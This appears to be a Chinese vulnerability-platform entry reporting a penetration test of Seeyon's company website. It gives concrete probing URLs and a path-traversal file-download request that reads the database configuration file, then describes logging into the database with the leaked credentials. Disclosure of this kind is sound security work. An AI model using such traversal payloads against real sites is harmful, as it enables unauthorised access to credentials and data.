对北京致远协创软件有限公司官方网站的一次渗透性测试

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 能不能积极确认漏洞,别总忽略!还能不能玩耍了!O(∩_∩)O哈哈~ ### 详细说明: 由任意文件下载到读取数据库配置文件 查看伪静态文件 ``` http://www.seeyon.com/.htaccess ``` phpinfo ``` http://www.seeyon.com/phpinfo.php ``` 物理路径泄露 ``` http://www.seeyon.com/inc/db.php ``` ### 漏洞证明: 任意文件下载读取数据库配置文件 ``` http://www.seeyon.com/downfile.php?file=/../inc/conn.php ``` [<img src="https://images.seebug.org/upload/201504/03132256b0a456819b7b6f11c38f970977cee76f.png" alt="see.PNG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/03132256b0a456819b7b6f11c38f970977cee76f.png) seeyon用户允许远程连接,利用navicat链接,成功控制数据库 [<img src="https://images.seebug.org/upload/201504/03132537f34ef2208cd6f03b186cb6477a4fca0a.png" alt="see.PNG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/03132537f34ef2208cd6f03b186cb6477a4fca0a.png) 或者使用seeyon自带的phpmyadmin [<img src="https://images.seebug.org/upload/201504/03134256deaa0820da11828f896598bd6e5e8348.png" alt="see.PNG" width="600"...

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息